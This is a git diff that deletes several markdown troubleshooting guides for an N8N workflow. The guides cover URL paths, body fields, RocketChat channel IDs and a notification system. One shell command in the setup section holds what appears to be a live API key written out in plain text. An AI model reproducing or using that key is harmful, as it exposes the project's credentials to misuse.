- -**Fix**: Ensure the node includes: -```javascript -missionId: missionData?.missionId || missionData?.body?.missionId -``` - -#### Issue 3.2: Incorrect URL in Save Mission To API Node - -**Check**: The "Save Mission To API" node URL should be: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created -``` - -**NOT**: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }} -``` - -#### Issue 3.3: Missing missionId in Save Mission To API Body - -**Check**: The "Save Mission To API" node body should include: -- Parameter: `missionId` -- Value: `{{ $node['Process Mission Data'].json.missionId }}` - -#### Issue 3.4: API Key Mismatch - -**Check**: The API key in the "Save Mission To API" node header should match your `N8N_API_KEY` environment variable. - -**Fix**: Use: -``` -{{ $node['Process Mission Data'].json.config.N8N_API_KEY }} -``` - -### Debug Workflow Errors - -1. **Check N8N Execution Logs**: - - Go to N8N → Executions - - Find the failed execution - - Click on it to see which node failed - - Check the error message - -2. **Test Each Node Individually**: - - Execute the workflow step by step - - Check each node's output - - Verify data is flowing correctly - ---- - -## 📋 Complete Checklist - -### Environment Variables -- [ ] `N8N_API_KEY` is set in `.env.local` or production environment -- [ ] Value matches the API key used in N8N workflow -- [ ] Application has been restarted after adding the variable - -### N8N Workflow Configuration -- [ ] Workflow is **ACTIVE** (green toggle in N8N) -- [ ] Webhook path is: `mission-created` -- [ ] Webhook URL is: `https://brain.slm-lab.net/webhook/mission-created` -- [ ] "Process Mission Data" node includes `missionId` in output -- [ ] "Save Mission To API" node URL is correct: `{{ MISSION_API_URL }}/api/missions/mission-created` -- [ ] "Save Mission To API" node includes `missionId` in body parameters -- [ ] "Save Mission To API" node includes `x-api-key` header with correct value - -### Testing -- [ ] Test webhook URL returns 200 (not 404) -- [ ] Create a test mission -- [ ] Check N8N execution logs for errors -- [ ] Verify mission IDs are saved to database after creation - ---- - -## 🧪 Step-by-Step Testing - -### Step 1: Verify Environment Variable - -```bash -# In your terminal (if running locally) -echo $N8N_API_KEY - -# Or check in your application logs -# Should NOT see: "N8N_API_KEY is not set in environment variables" -``` - -### Step 2: Test Webhook is Active - -```bash -curl -X POST https://brain.slm-lab.net/webhook/mission-created \ - -H "Content-Type: application/json" \ - -d '{"test": "data"}' -``` - -**Expected Results**: -- ✅ **200/400/500 with workflow error**: Webhook is active (workflow may fail due to invalid data, but webhook is registered) -- ❌ **404 with "webhook not registered"**: Webhook is NOT active → Activate workflow in N8N - -### Step 3: Test Mission Creation - -1. Create a mission via your frontend -2. Check server logs - should NOT see: - - ❌ "N8N_API_KEY is not set" - - ❌ "404 webhook not registered" -3. Check N8N execution logs - should see successful execution -4. 
Check database - mission should have integration IDs saved - ---- - -## 🔧 Quick Fix Commands - -### Add N8N_API_KEY to .env.local - -```bash -# Add to .env.local file -echo "N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4" >> .env.local - -# Restart your development server -# npm run dev -# or -# yarn dev -``` - -### Verify Environment Variable is Loaded - -Create a test endpoint to verify: - -```typescript -// app/api/test-n8n-config/route.ts -import { NextResponse } from 'next/server'; - -export async function GET() { - return NextResponse.json({ - hasN8NApiKey: !!process.env.N8N_API_KEY, - n8nWebhookUrl: process.env.N8N_WEBHOOK_URL || 'https://brain.slm-lab.net/webhook/mission-created', - missionApiUrl: process.env.NEXT_PUBLIC_API_URL - }); -} -``` - -Then visit: `http://localhost:3000/api/test-n8n-config` - ---- - -## 📝 Summary of Fixes - -1. **Add `N8N_API_KEY` to environment variables** - - File: `.env.local` (development) or production environment - - Value: Your actual N8N API key - - Restart application after adding - -2. **Activate N8N Workflow** - - Open workflow in N8N - - Click "Active" toggle (should be green/on) - - Verify webhook is registered - -3. **Fix Workflow Configuration** - - Ensure "Save Mission To API" URL is correct - - Ensure `missionId` is included in body - - Check N8N execution logs for specific errors - ---- - -## 🚨 If Still Not Working - -### Check N8N Execution Logs - -1. Go to N8N → Executions -2. Find the latest failed execution -3. Click on it -4. Check which node failed -5. Look at the error message -6. Fix the specific issue - -### Common Additional Issues - -- **Network connectivity**: N8N can't reach your API -- **CORS issues**: If calling from browser -- **Authentication**: API key mismatch -- **Data format**: Body parameters don't match expected format - ---- - -**Document Created**: $(date) -**Priority**: CRITICAL - Blocks mission creation - diff --git a/N8N_ROCKETCHAT_FIX.md b/N8N_ROCKETCHAT_FIX.md deleted file mode 100644 index 5768aa8..0000000 --- a/N8N_ROCKETCHAT_FIX.md +++ /dev/null @@ -1,98 +0,0 @@ -# Correction N8N - RocketChat Channel ID - -## 🔍 Problème identifié - -D'après la réponse du webhook N8N, la structure de `rocketChatChannel` est : -```json -"rocketChatChannel": { - "id": "6966cbb6c8e9627bcb87daad", - "name": "seffirouuuuuu", - "exists": true, - "error": null -} -``` - -Mais dans le node **"Save Mission To API"**, le code cherche : -``` -$node['Combine Results'].json.rocketChatChannel?.channel?._id -``` - -Ce qui ne correspond pas à la structure réelle qui est `rocketChatChannel.id` (pas `rocketChatChannel.channel._id`). - ---- - -## ✅ Solution : Modifier dans N8N - -### Étape 1 : Ouvrir le workflow N8N - -1. Connectez-vous à N8N -2. Ouvrez le workflow qui gère la création de missions -3. Trouvez le node **"Save Mission To API"** - -### Étape 2 : Modifier le paramètre `rocketchatChannelId` - -Dans le node **"Save Mission To API"**, dans la section **Body Parameters**, trouvez le paramètre : - -**Nom** : `rocketchatChannelId` - -**Valeur actuelle (INCORRECTE)** : -``` -={{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }} -``` - -**Valeur à mettre (CORRECTE)** : -``` -={{ $node['Combine Results'].json.rocketChatChannel?.id || $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }} -``` - -Cette expression essaie d'abord `rocketChatChannel.id` (la structure réelle), puis fait un fallback sur `rocketChatChannel.channel._id` (ancienne structure) si la première n'existe pas. 
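-
-Hors de N8N, cette logique de repli se résume ainsi (esquisse TypeScript ; les types et le nom de fonction sont hypothétiques) :
-
-```typescript
-// Nouvelle structure ({ id, name, exists }) d'abord, ancienne ({ channel: { _id } }) ensuite.
-type RocketChatResult = {
-  id?: string;
-  channel?: { _id?: string };
-};
-
-function extractChannelId(result?: RocketChatResult): string {
-  return result?.id ?? result?.channel?._id ?? '';
-}
-
-// extractChannelId({ id: '6966cbb6c8e9627bcb87daad' }) → '6966cbb6c8e9627bcb87daad'
-// extractChannelId({ channel: { _id: 'abc' } })        → 'abc'
-// extractChannelId(undefined)                          → ''
-```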
- ---- - -## 🔍 Vérification dans "Combine Results" - -Vérifiez aussi que le node **"Combine Results"** structure correctement les données. - -Dans le code JavaScript de "Combine Results", la ligne qui traite RocketChat devrait extraire l'ID correctement. Vérifiez que cette partie du code gère bien les deux structures : - -```javascript -// Process RocketChat channel result -if (rocketChatResult.error?.includes('error-duplicate-channel-name')) { - console.log('RocketChat channel already exists'); - rocketChatResult = { exists: true }; -} else if (rocketChatResult.body?.channel?._id) { - resourceStatus.rocketChatChannel = true; -} - -// ... - -// Dans la construction du résultat -rocketChatChannel: rocketChatResult.error ? { error: ... } : (rocketChatResult.body || rocketChatResult || {}) -``` - -Si la réponse de RocketChat est directement dans `rocketChatResult.body.channel._id`, alors `rocketChatResult.body` contiendra `{ channel: { _id: "..." } }`. - -Mais d'après votre réponse, il semble que "Combine Results" transforme déjà la structure en `{ id: "...", name: "...", exists: true }`. - ---- - -## 🧪 Test après modification - -Après avoir modifié le node "Save Mission To API", testez avec : - -```bash -./test-n8n-python.py [MISSION_ID] [PROJECT_NAME] -``` - -Vérifiez dans les logs Next.js que `rocketchatChannelId` est bien reçu avec la valeur `"6966cbb6c8e9627bcb87daad"` (ou l'ID réel du channel). - ---- - -## 📝 Résumé des changements - -**Node à modifier** : "Save Mission To API" -**Paramètre** : `rocketchatChannelId` -**Ancienne valeur** : `={{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}` -**Nouvelle valeur** : `={{ $node['Combine Results'].json.rocketChatChannel?.id || $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}` - -Cette modification permet de supporter les deux structures (ancienne et nouvelle) pour plus de robustesse. diff --git a/N8N_SAVE_MISSION_API_FIX.md b/N8N_SAVE_MISSION_API_FIX.md deleted file mode 100644 index fea13e6..0000000 --- a/N8N_SAVE_MISSION_API_FIX.md +++ /dev/null @@ -1,267 +0,0 @@ -# N8N Save Mission To API Node - Fix Required - -## 🔍 Problem Analysis - -Based on the N8N workflow configuration you provided, I've identified **TWO CRITICAL ISSUES**: - ---- - -## ❌ Issue 1: Incorrect URL - -### Current Configuration -``` -URL: {{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }} -``` - -### What This Produces -- `MISSION_API_URL` = `https://hub.slm-lab.net` (from your config) -- Result: `https://hub.slm-lab.net/mission-created` ❌ - -### Actual Endpoint -- Should be: `https://hub.slm-lab.net/api/missions/mission-created` ✅ - -### Fix Required -``` -URL: {{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created -``` - -**Note**: Remove the `+` operator and add `/api/missions` before `/mission-created` - ---- - -## ❌ Issue 2: Missing `missionId` in Body - -### Current Configuration -Looking at your `base.json`, I can see the body parameters, but **`missionId` is MISSING**! 
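-
-For context, the lookup order this implies on the server side (detailed below) can be sketched as follows. This is an illustration only: the `findMission` helper and the Prisma-style client are assumptions, not the actual handler code.
-
-```typescript
-// Assumed Prisma-style client; the real data layer may differ.
-declare const prisma: any;
-
-async function findMission(body: {
-  missionId?: string;
-  name?: string;
-  creatorId?: string;
-}) {
-  if (body.missionId) {
-    // Preferred: unique, unambiguous lookup by primary key
-    return prisma.mission.findUnique({ where: { id: body.missionId } });
-  }
-  // Fallback: works, but names are not guaranteed unique per creator
-  return prisma.mission.findFirst({
-    where: { name: body.name, creatorId: body.creatorId },
-  });
-}
-```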
-
-### What the Endpoint Expects
-From `app/api/missions/mission-created/route.ts`:
-- `missionId` ⚠️ **REQUIRED** - Used to find the mission (preferred over `name` + `creatorId`); currently missing from your body
-- `gitRepoUrl` → maps to `giteaRepositoryUrl` in database
-- `leantimeProjectId` → maps to `leantimeProjectId` in database
-- `documentationCollectionId` → maps to `outlineCollectionId` in database
-- `rocketchatChannelId` → maps to `rocketChatChannelId` in database
-- `creatorId` ✅ (you have this)
-- `name` ✅ (you have this)
-
-### What N8N Should Send
-
-**Body Parameters** (in N8N HTTP Request node):
-
-| Field Name | Value Expression |
-|------------|------------------|
-| `name` | `{{ $node['Process Mission Data'].json.missionProcessed.name }}` |
-| `niveau` | `{{ $node['Process Mission Data'].json.missionProcessed.niveau || 'default' }}` |
-| `intention` | `{{ $node['Process Mission Data'].json.missionProcessed.intention }}` |
-| `gitRepoUrl` | `{{ $node['Combine Results'].json.gitRepo?.html_url || '' }}` |
-| `leantimeProjectId` | `{{ $node['Combine Results'].json.leantimeProject?.result?.[0] || '' }}` |
-| `documentationCollectionId` | `{{ $node['Combine Results'].json.docCollection?.data?.id || '' }}` |
-| `rocketchatChannelId` | `{{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}` |
-| `missionId` | `{{ $node['Process Mission Data'].json.missionId }}` |
-| `creatorId` | `{{ $node['Process Mission Data'].json.creatorId }}` |
-
-**⚠️ CRITICAL**: The field names must match exactly:
-- `gitRepoUrl` (not `gitRepo` or `giteaRepositoryUrl`)
-- `leantimeProjectId` (not `leantimeProject` or `leantimeId`)
-- `documentationCollectionId` (not `docCollection` or `outlineCollectionId`)
-- `rocketchatChannelId` (not `rocketChatChannel` or `rocketChatChannelId`)
-
----
-
-## ✅ Complete Fix for N8N Node
-
-### Step 1: Fix the URL
-
-In the "Save Mission To API" HTTP Request node:
-
-**Current (WRONG)**:
-```
-{{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }}
-```
-
-**Fixed (CORRECT)**:
-```
-{{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created
-```
-
-### Step 2: Configure Body Parameters
-
-In the "Save Mission To API" HTTP Request node, set **Body Parameters**:
-
-**Method**: `POST`
-**Send Body**: `Yes`
-**Body Content Type**: `JSON` (or use Body Parameters)
-
-**Body Parameters** (add each as a parameter):
-
-1. **Parameter Name**: `name`
-   **Value**: `{{ $node['Process Mission Data'].json.missionProcessed.name }}`
-
-2. **Parameter Name**: `niveau`
-   **Value**: `{{ $node['Process Mission Data'].json.missionProcessed.niveau || 'default' }}`
-
-3. **Parameter Name**: `intention`
-   **Value**: `{{ $node['Process Mission Data'].json.missionProcessed.intention }}`
-
-4. **Parameter Name**: `gitRepoUrl` ⚠️ (MUST be this exact name)
-   **Value**: `{{ $node['Combine Results'].json.gitRepo?.html_url || '' }}`
-
-5. **Parameter Name**: `leantimeProjectId` ⚠️ (MUST be this exact name)
-   **Value**: `{{ $node['Combine Results'].json.leantimeProject?.result?.[0] || '' }}`
-
-6. 
**Parameter Name**: `documentationCollectionId` ⚠️ (MUST be this exact name) - **Value**: `{{ $node['Combine Results'].json.docCollection?.data?.id || '' }}` - -7. **Parameter Name**: `rocketchatChannelId` ⚠️ (MUST be this exact name) - **Value**: `{{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}` - -8. **Parameter Name**: `missionId` ⚠️ **MISSING - MUST ADD THIS** - **Value**: `{{ $node['Process Mission Data'].json.missionId }}` - -9. **Parameter Name**: `creatorId` - **Value**: `{{ $node['Process Mission Data'].json.creatorId }}` - -**⚠️ CRITICAL**: The `missionId` field is **MISSING** from your current configuration. The endpoint prefers `missionId` over `name + creatorId` for more reliable mission lookup. - -### Step 3: Verify Headers - -**Headers** should include: -- `Content-Type`: `application/json` -- `x-api-key`: `{{ $node['Process Mission Data'].json.config.N8N_API_KEY }}` - ---- - -## 🧪 Testing the Fix - -### Test 1: Check URL - -After fixing, the URL should resolve to: -``` -https://hub.slm-lab.net/api/missions/mission-created -``` - -### Test 2: Check Request Body - -After fixing, the request body should look like: -```json -{ - "name": "Mission Name", - "niveau": "default", - "intention": "Mission description", - "gitRepoUrl": "https://gite.slm-lab.net/alma/repo-name", - "leantimeProjectId": "123", - "documentationCollectionId": "collection-id", - "rocketchatChannelId": "channel-id", - "missionId": "mission-uuid", - "creatorId": "user-uuid" -} -``` - -### Test 3: Check Server Response - -The endpoint should return: -```json -{ - "success": true, - "message": "Mission updated successfully", - "mission": { - "id": "mission-uuid", - "name": "Mission Name", - "giteaRepositoryUrl": "https://gite.slm-lab.net/alma/repo-name", - "leantimeProjectId": "123", - "outlineCollectionId": "collection-id", - "rocketChatChannelId": "channel-id" - } -} -``` - ---- - -## 📋 Verification Checklist - -After applying the fix: - -- [ ] URL is correct: `{{ MISSION_API_URL }}/api/missions/mission-created` -- [ ] Body includes `gitRepoUrl` field (not `gitRepo` or `giteaRepositoryUrl`) -- [ ] Body includes `leantimeProjectId` field (not `leantimeProject` or `leantimeId`) -- [ ] Body includes `documentationCollectionId` field (not `docCollection` or `outlineCollectionId`) -- [ ] Body includes `rocketchatChannelId` field (not `rocketChatChannel`) -- [ ] Body includes `missionId` field -- [ ] Body includes `creatorId` field -- [ ] Headers include `x-api-key` -- [ ] Headers include `Content-Type: application/json` -- [ ] Test execution shows 200 OK response -- [ ] Database shows IDs saved after mission creation - ---- - -## 🔍 Debugging - -### If Still Not Working - -1. **Check N8N Execution Logs**: - - Look at "Save Mission To API" node execution - - Check the actual URL being called - - Check the actual body being sent - - Check the response status code - -2. **Check Server Logs**: - - Look for `/api/missions/mission-created` endpoint calls - - Check for 404 errors (wrong URL) - - Check for 400 errors (missing fields) - - Check for 401 errors (wrong API key) - -3. 
**Test Manually**: - ```bash - curl -X POST https://hub.slm-lab.net/api/missions/mission-created \ - -H "Content-Type: application/json" \ - -H "x-api-key: YOUR_N8N_API_KEY" \ - -d '{ - "missionId": "test-mission-id", - "name": "Test Mission", - "creatorId": "test-user-id", - "gitRepoUrl": "https://gite.slm-lab.net/alma/test", - "leantimeProjectId": "123", - "documentationCollectionId": "collection-456", - "rocketchatChannelId": "channel-789" - }' - ``` - ---- - -## 📝 Summary - -**Two critical fixes required**: - -1. **URL Fix**: Change from: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }} - ``` - To: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created - ``` - -2. **Add Missing `missionId` Field**: Add this parameter to the body: - - **Name**: `missionId` - - **Value**: `{{ $node['Process Mission Data'].json.missionId }}` - -**Note**: Your field names are already correct (`gitRepoUrl`, `leantimeProjectId`, etc.), but `missionId` is missing which is critical for reliable mission lookup. - -After these fixes, the N8N workflow should successfully save integration IDs to the database, and mission deletion should work correctly. - ---- - -**Document Created**: $(date) -**Priority**: CRITICAL - Blocks mission deletion functionality - diff --git a/N8N_WRONG_URL_FIX.md b/N8N_WRONG_URL_FIX.md deleted file mode 100644 index 22da940..0000000 --- a/N8N_WRONG_URL_FIX.md +++ /dev/null @@ -1,210 +0,0 @@ -# N8N Wrong URL - Getting HTML Instead of JSON - -## 🔍 Problem Identified - -**N8N "Save Mission To API" node is receiving HTML (404 page) instead of JSON response.** - -### What N8N Receives - -```html - - - ... -

-<h1>404</h1>
-<h2>This page could not be found.</h2>

- ... - -``` - -**This is a Next.js 404 page**, not the API endpoint response! - ---- - -## ❌ Root Cause - -**The URL in N8N is pointing to a Next.js page route instead of the API endpoint.** - -### Current (WRONG) URL - -N8N is probably calling: -``` -https://hub.slm-lab.net/mission-created -``` - -This matches Next.js route: `app/[section]/page.tsx` -- Next.js tries to find a page at `/mission-created` -- No page exists, so it returns 404 HTML page -- N8N receives HTML instead of JSON - -### Correct URL - -Should be: -``` -https://hub.slm-lab.net/api/missions/mission-created -``` - -This matches API route: `app/api/missions/mission-created/route.ts` -- Next.js routes to the API endpoint -- Returns JSON response -- N8N receives proper JSON - ---- - -## ✅ Solution - -### Fix the URL in N8N "Save Mission To API" Node - -**Current (WRONG)**: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }} -``` - -**Or**: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/mission-created -``` - -**Fixed (CORRECT)**: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created -``` - -### Step-by-Step Fix - -1. **Open N8N workflow** -2. **Find "Save Mission To API" node** -3. **Click on it to edit** -4. **In the URL field**, change from: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/mission-created - ``` - - To: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created - ``` - -5. **Save the node** -6. **Activate the workflow** (if not already active) -7. **Test by creating a new mission** - ---- - -## 🧪 Verification - -### After Fix, N8N Should Receive - -**Expected JSON Response**: -```json -{ - "success": true, - "message": "Mission updated successfully", - "mission": { - "id": "mission-uuid", - "name": "Mission Name", - "giteaRepositoryUrl": "https://gite.slm-lab.net/alma/repo-name", - "leantimeProjectId": "123", - "outlineCollectionId": "collection-456", - "rocketChatChannelId": "channel-789" - } -} -``` - -**NOT HTML**: -```html -... -``` - -### Check Server Logs - -After fix, you should see: -``` -Mission Created Webhook Received -Received mission-created data: { ... } -Found mission: { id: "...", name: "..." } -Updating giteaRepositoryUrl: ... -Mission updated successfully -``` - ---- - -## 📋 Complete URL Configuration - -### In N8N "Save Mission To API" Node - -**URL**: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created -``` - -**Method**: `POST` - -**Headers**: -- `Content-Type`: `application/json` -- `x-api-key`: `{{ $node['Process Mission Data'].json.config.N8N_API_KEY }}` - -**Body Parameters**: -- `missionId`: `{{ $node['Process Mission Data'].json.missionId }}` -- `name`: `{{ $node['Process Mission Data'].json.missionProcessed.name }}` -- `creatorId`: `{{ $node['Process Mission Data'].json.creatorId }}` -- `gitRepoUrl`: `{{ $node['Combine Results'].json.gitRepo?.html_url || '' }}` -- `leantimeProjectId`: `{{ $node['Combine Results'].json.leantimeProject?.result?.[0] || '' }}` -- `documentationCollectionId`: `{{ $node['Combine Results'].json.docCollection?.data?.id || '' }}` -- `rocketchatChannelId`: `{{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}` - ---- - -## 🔍 Why This Happens - -### Next.js Routing - -Next.js has two types of routes: - -1. 
**Page Routes** (`app/[section]/page.tsx`): - - Matches: `/mission-created` - - Returns: HTML page - - Used for: Frontend pages - -2. **API Routes** (`app/api/missions/mission-created/route.ts`): - - Matches: `/api/missions/mission-created` - - Returns: JSON response - - Used for: API endpoints - -### The Problem - -When N8N calls `/mission-created`: -- Next.js matches it to `app/[section]/page.tsx` -- `section = "mission-created"` -- Page doesn't exist in `menuItems` -- Returns 404 HTML page - -When N8N calls `/api/missions/mission-created`: -- Next.js matches it to `app/api/missions/mission-created/route.ts` -- Executes the API handler -- Returns JSON response - ---- - -## ✅ Summary - -**Problem**: N8N receives HTML 404 page instead of JSON - -**Cause**: URL is missing `/api/missions` prefix - -**Fix**: Change URL from: -``` -{{ MISSION_API_URL }}/mission-created -``` - -To: -``` -{{ MISSION_API_URL }}/api/missions/mission-created -``` - -**After Fix**: N8N will receive JSON response and IDs will be saved to database. - ---- - -**Document Created**: $(date) -**Priority**: CRITICAL - Blocks integration IDs from being saved - diff --git a/NOTIFICATIONS_COMPLETE_SYSTEM.md b/NOTIFICATIONS_COMPLETE_SYSTEM.md deleted file mode 100644 index 0b024fa..0000000 --- a/NOTIFICATIONS_COMPLETE_SYSTEM.md +++ /dev/null @@ -1,156 +0,0 @@ -# 🔔 Système de Notifications Complet - -## ✅ Adapters Implémentés - -Le système de notifications agrège maintenant **3 sources** : - -1. **Leantime** (`leantime-adapter.ts`) - - Notifications de tâches, commentaires, mentions - - Polling toutes les 30 secondes - -2. **RocketChat** (`rocketchat-adapter.ts`) ⚡ NOUVEAU - - Messages non lus dans Parole - - Déclenchement en temps réel quand nouveau message détecté - -3. **Email** (`email-adapter.ts`) ⚡ NOUVEAU - - Emails non lus dans Courrier (INBOX uniquement) - - Déclenchement en temps réel quand nouvel email détecté - ---- - -## 🎯 Flow Complet - -### Badge de Notification - -Le badge rouge affiche maintenant le **total agrégé** : -``` -Total = Leantime (unread) + RocketChat (unread) + Email (unread) -``` - -### Déclenchement Temps Réel - -#### 1. **Nouveau Message Parole** -``` -Widget Parole détecte nouveau message - └─> totalUnreadCount augmente - └─> triggerNotificationRefresh() - └─> Invalide cache notifications - └─> NotificationService.getNotificationCount() - ├─> LeantimeAdapter.getNotificationCount() - ├─> RocketChatAdapter.getNotificationCount() ⚡ - └─> EmailAdapter.getNotificationCount() ⚡ - └─> Badge mis à jour (< 1 seconde) -``` - -#### 2. **Nouvel Email Courrier** -``` -checkForNewEmails() détecte nouvel email - └─> newestEmailId > lastKnownEmailId - └─> triggerNotificationRefresh() ⚡ - └─> Invalide cache notifications - └─> NotificationService.getNotificationCount() - ├─> LeantimeAdapter.getNotificationCount() - ├─> RocketChatAdapter.getNotificationCount() - └─> EmailAdapter.getNotificationCount() ⚡ - └─> Badge mis à jour (< 1 seconde) -``` - -#### 3. 
**Notification Leantime** -``` -Polling toutes les 30s - └─> LeantimeAdapter.getNotificationCount() - └─> Badge mis à jour -``` - ---- - -## 📊 Structure des Counts - -```typescript -NotificationCount { - total: number, // Total de toutes les sources - unread: number, // Total non lus de toutes les sources - sources: { - leantime: { - total: number, - unread: number - }, - rocketchat: { - total: number, - unread: number - }, - email: { - total: number, - unread: number - } - } -} -``` - ---- - -## 🔧 Fichiers Modifiés/Créés - -### Nouveaux Fichiers -- `lib/services/notifications/rocketchat-adapter.ts` - Adapter RocketChat -- `lib/services/notifications/email-adapter.ts` - Adapter Email -- `hooks/use-trigger-notification.ts` - Hook pour déclencher refresh - -### Fichiers Modifiés -- `lib/services/notifications/notification-service.ts` - Enregistrement des nouveaux adapters -- `components/parole.tsx` - Détection et déclenchement pour RocketChat -- `hooks/use-email-state.ts` - Déclenchement pour Email (déjà présent) -- `hooks/use-notifications.ts` - Écoute d'événements custom -- `app/api/notifications/count/route.ts` - Support `?force=true` -- `app/api/rocket-chat/messages/route.ts` - Retourne `totalUnreadCount` - ---- - -## 🎨 Avantages - -1. **⚡ Temps Réel** : Notifications instantanées (< 1 seconde) -2. **📊 Multi-Sources** : Leantime + RocketChat + Email -3. **💚 Efficace** : Déclenchement uniquement quand nécessaire -4. **🔄 Rétrocompatible** : Le polling reste en fallback -5. **📈 Scalable** : Facile d'ajouter d'autres adapters - ---- - -## 🚀 Résultat Final - -Le badge de notification affiche maintenant : -- ✅ Notifications Leantime (polling 30s) -- ✅ Messages non lus RocketChat (temps réel) -- ✅ Emails non lus Courrier (temps réel) - -**Total = Leantime + RocketChat + Email** 🎉 - ---- - -## 📝 Notes Techniques - -### RocketChat Adapter -- Utilise les subscriptions RocketChat -- Compte les messages non lus (`unread > 0`) -- Supporte channels, groups, et DMs - -### Email Adapter -- Utilise le cache Redis de `/api/courrier/unread-counts` -- Focus sur INBOX (principal dossier pour notifications) -- Peut être étendu pour d'autres dossiers si besoin - -### Cache Strategy -- **Leantime** : Cache 30s (aligné avec polling) -- **RocketChat** : Pas de cache dédié (utilise cache messages) -- **Email** : Cache 2 minutes (via unread-counts API) - ---- - -## 🔍 Debugging - -Pour voir les logs : -- `[ROCKETCHAT_ADAPTER]` - Adapter RocketChat -- `[EMAIL_ADAPTER]` - Adapter Email -- `[Parole]` - Détection dans widget Parole -- `[useTriggerNotification]` - Déclenchement refresh -- `[NOTIFICATION_SERVICE]` - Agrégation des counts diff --git a/NOTIFICATIONS_DEEP_ANALYSIS.md b/NOTIFICATIONS_DEEP_ANALYSIS.md deleted file mode 100644 index 5ae040b..0000000 --- a/NOTIFICATIONS_DEEP_ANALYSIS.md +++ /dev/null @@ -1,452 +0,0 @@ -# 🔔 Analyse Approfondie du Système de Notifications - -## 📋 Vue d'ensemble - -Le système de notifications est un système **multi-sources** qui agrège les notifications de plusieurs services externes (Leantime, RocketChat, Email) et les affiche dans un badge clignotant rouge dans la navbar. - -**Architecture actuelle :** -- **Service Pattern** : Singleton avec adapter pattern -- **3 Adapters implémentés** : Leantime, RocketChat, Email -- **Cache** : Redis avec TTL de 30 secondes -- **Polling** : 30 secondes via `useUnifiedRefresh` -- **Temps réel** : Système hybride avec event-driven triggers - ---- - -## 🏗️ Architecture Actuelle - -### 1. 
Composants Frontend - -#### `components/notification-badge.tsx` -- **Rôle** : Affiche le badge de notification et le dropdown -- **Problèmes identifiés** : - - ❌ **Logs de debug excessifs** : 6 `console.log` au render - - ❌ **Double fetch** : `manualFetch()` appelé à la fois dans `useEffect` et `handleOpenChange` - - ❌ **Pas de fonctionnalité "Mark as read"** : Les notifications ne peuvent pas être marquées comme lues depuis le dropdown - - ❌ **Pas de pagination** : Limite fixe à 10 notifications - - ❌ **Pas de tri/filtre** : Toutes les notifications mélangées - - ❌ **Pas d'actions** : Impossible d'interagir avec les notifications (ouvrir, marquer lu, supprimer) - -#### `hooks/use-notifications.ts` -- **Rôle** : Hook principal pour gérer les notifications -- **Problèmes identifiés** : - - ⚠️ **Force refresh par défaut** : `fetchNotificationCount(true)` au mount - - ⚠️ **Pas de fonction markAsRead** : Aucune méthode pour marquer comme lu - - ⚠️ **Deduplication complexe** : Utilise `requestDeduplicator` mais peut être simplifié - - ✅ **Unified refresh** : Bien intégré avec `useUnifiedRefresh` - -### 2. Backend Services - -#### `lib/services/notifications/notification-service.ts` -- **Rôle** : Service singleton qui agrège les notifications -- **Problèmes identifiés** : - - ⚠️ **Pas de méthode markAsRead** : Le service ne peut pas marquer les notifications comme lues - - ⚠️ **Background refresh inutilisé** : `scheduleBackgroundRefresh()` existe mais n'est jamais appelé - - ✅ **Cache bien géré** : Redis avec TTL approprié - - ✅ **Adapter pattern** : Architecture extensible - -#### Adapters - -**LeantimeAdapter** (`leantime-adapter.ts`) -- ✅ **Fonctionnel** : Récupère les notifications Leantime -- ❌ **Pas de markAsRead** : Ne peut pas marquer les notifications comme lues -- ⚠️ **Cache complexe** : Cache des user IDs avec TTL - -**RocketChatAdapter** (`rocketchat-adapter.ts`) -- ✅ **Fonctionnel** : Récupère les messages non lus -- ❌ **Pas de markAsRead** : Ne peut pas marquer les messages comme lus -- ⚠️ **Logique de recherche utilisateur** : Complexe, pourrait être optimisée - -**EmailAdapter** (`email-adapter.ts`) -- ✅ **Fonctionnel** : Récupère les emails non lus -- ❌ **Pas de markAsRead** : Ne peut pas marquer les emails comme lus -- ⚠️ **Support Graph API** : Gère Microsoft Graph mais logique complexe - -### 3. API Routes - -#### `/api/notifications/count` ✅ -- **Fonctionnel** : Retourne le nombre de notifications non lues -- **Support force refresh** : `?force=true` pour bypasser le cache -- ✅ **Bien implémenté** - -#### `/api/notifications` ✅ -- **Fonctionnel** : Retourne la liste des notifications -- **Pagination** : Support `page` et `limit` -- ✅ **Bien implémenté** - -#### `/api/notifications/[id]/read` ❌ **MANQUANT** -- **Problème critique** : Aucun endpoint pour marquer les notifications comme lues -- **Impact** : Les utilisateurs ne peuvent pas marquer les notifications comme lues depuis le dropdown - ---- - -## 🐛 Problèmes Critiques Identifiés - -### 1. ❌ **Pas de fonctionnalité "Mark as Read"** - -**Problème** : -- Aucun endpoint API pour marquer les notifications comme lues -- Aucune méthode dans le service ou les adapters -- Les utilisateurs ne peuvent pas interagir avec les notifications - -**Impact** : -- UX dégradée : les notifications restent "non lues" indéfiniment -- Badge rouge persiste même après avoir vu les notifications -- Pas de moyen de gérer les notifications - -**Solution nécessaire** : -1. Créer `/api/notifications/[id]/read` endpoint -2. 
